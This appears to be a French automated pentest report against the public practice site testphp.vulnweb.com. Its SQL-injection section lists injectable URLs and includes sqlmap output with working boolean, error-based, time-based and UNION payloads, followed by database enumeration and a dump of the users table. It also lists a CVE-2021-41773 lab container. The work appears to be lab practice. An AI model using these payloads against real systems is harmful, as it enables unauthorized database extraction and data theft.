============================================================
       RAPPORT DE SÉCURITÉ - 20250510_143928
============================================================


=== SCAN NIKTO ===
Aucun résultat de Nikto trouvé.


Les résultats de Nikto sont affichés dans la console lors du scan.


=== SCAN DIRB ===
Aucun résultat DIRB trouvé.


=== REDIRECTIONS DETECTÉES ===
Aucune redirection détectée.


Les résultats de DIRB sont affichés dans la console lors du scan.


=== SCAN XSS ===
Aucun résultat de scan XSS trouvé.


=== SCAN INJECTION SQL ===
Fichier: results/rapport_SQL.txt
=== RAPPORT SQLMC COMPLET ===

>>> Rapport de scan :
=== RAPPORT SQLMC - 10/05/2025 14:36:16 ===

URL cible: http://testphp.vulnweb.com/
Profondeur de scan: 3
Généré le: 10/05/2025 à 14:36:16

=== URL(s) VULNÉRABLE(S) ===
- http://testphp.vulnweb.com/artists.php?artist=3
- http://testphp.vulnweb.com/listproducts.php?cat=4
- http://testphp.vulnweb.com/listproducts.php?cat=1
- http://testphp.vulnweb.com/listproducts.php?cat=3
- http://testphp.vulnweb.com/listproducts.php?cat=2
- http://testphp.vulnweb.com/artists.php?artist=1
- http://testphp.vulnweb.com/artists.php?artist=2
- http://testphp.vulnweb.com/product.php?pic=3
- http://testphp.vulnweb.com/product.php?pic=4
- http://testphp.vulnweb.com/product.php?pic=1
- http://testphp.vulnweb.com/listproducts.php?artist=2
- http://testphp.vulnweb.com/product.php?pic=2
- http://testphp.vulnweb.com/listproducts.php?artist=3
- http://testphp.vulnweb.com/product.php?pic=7
- http://testphp.vulnweb.com/listproducts.php?artist=1
- http://testphp.vulnweb.com/product.php?pic=5

=== URL(s) NON VULNÉRABLES ===
- http://testphp.vulnweb.com/disclaimer.php
- http://testphp.vulnweb.com/cart.php
- http://testphp.vulnweb.com/AJAX/index.php
- http://testphp.vulnweb.com/guestbook.php
- http://testphp.vulnweb.com/privacy.php
- http://testphp.vulnweb.com/userinfo.php
- http://testphp.vulnweb.com/categories.php
- http://testphp.vulnweb.com//hpp/
- http://testphp.vulnweb.com/artists.php
- http://testphp.vulnweb.com/index.php
- http://testphp.vulnweb.com/login.php
- http://testphp.vulnweb.com/#
- http://testphp.vulnweb.com/javascript:loadSomething('categories.php');
- http://testphp.vulnweb.com/javascript:loadSomething('artists.php');
- http://testphp.vulnweb.com/mailto:wvs@acunetix.com
- http://testphp.vulnweb.com/?pp=12
- http://testphp.vulnweb.com/signup.php
- http://testphp.vulnweb.com//Mod_Rewrite_Shop/
- http://testphp.vulnweb.com/showimage.php?file=./pictures/7.jpg
- http://testphp.vulnweb.com/Details/network-attached-storage-dlink/1/
- http://testphp.vulnweb.com/Details/web-camera-a4tech/2/
- http://testphp.vulnweb.com/showimage.php?file=./pictures/1.jpg
- http://testphp.vulnweb.com/showimage.php?file=./pictures/3.jpg
- http://testphp.vulnweb.com/Details/color-printer/3/
- http://testphp.vulnweb.com/showimage.php?file=./pictures/4.jpg
- http://testphp.vulnweb.com/showimage.php?file=./pictures/2.jpg
- http://testphp.vulnweb.com/showimage.php?file=./pictures/5.jpg

============================================================

>>> Bases de données détectées :
Bases de données trouvées :
- acuart
- information_schema

Base sélectionnée : acuart

============================================================

>>> Tables extraites :
Tables de la base de données : acuart
- artists
- carts
- categ
- featured
- guestbook
- pictures
- products
- users

Table sélectionnée : users

============================================================

>>> Colonnes extraites :

-- columns_acuart_users.txt --

============================================================

>>> Dumps extraits :

-- dump_acuart_users.txt --
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.9.2#stable}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:38:55 /2025-05-10/

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 2511=2511

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: artist=1 AND GTID_SUBSET(CONCAT(0x716a787a71,(SELECT (ELT(9573=9573,1))),0x71786a6a71),9573)

    Type: time-based blind
    Title: MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)
    Payload: artist=1 RLIKE (SELECT 1840 FROM (SELECT(SLEEP(5)))vqGz)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-7133 UNION ALL SELECT CONCAT(0x716a787a71,0x64704464745542766f66637575616c4e484c5273495775716b787a494a744261455576475a4f4a49,0x71786a6a71),NULL,NULL-- -
---
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL 8

Database: acuart
Table: users
[1 entry]
+---------------------+----------------------------------+------+-----------------+---------+-------+------------+-----------+
| cc                  | cart                             | pass | email           | phone   | uname | name       | address   |
+---------------------+----------------------------------+------+-----------------+---------+-------+------------+-----------+
| 1234-5678-2300-9000 | 732cf94289ca59e4ddc96ae7bd412e0c | test | email@email.com | 2323345 | test  | John+Smith | 21+street |
+---------------------+----------------------------------+------+-----------------+---------+-------+------------+-----------+


[*] ending @ 14:39:01 /2025-05-10/




=== CONTENEURS DOCKER ===
CONTAINER ID   IMAGE                                  COMMAND                  CREATED       STATUS       PORTS                                                        NAMES
ec42b3cd952e   blueteamsteve/cve-2021-41773:no-cgid   "httpd-foreground"       7 hours ago   Up 7 hours   0.0.0.0:8080->80/tcp, [::]:8080->80/tcp                      funny_lederberg
2ec644207e90   webdevops/php-apache:7.1               "/entrypoint supervi…"   7 hours ago   Up 7 hours   443/tcp, 9000/tcp, 0.0.0.0:8787->80/tcp, [::]:8787->80/tcp   reverent_chaum



=== INFORMATIONS SERVEUR ET EN-TÊTES DE SÉCURITÉ ===
Aucune information de serveur disponible.


=== PORTS OUVERTS ET SERVICES ===
Aucun résultat de scan de ports trouvé.


Vérifiez les ports ouverts et services dans les résultats du scan initial.

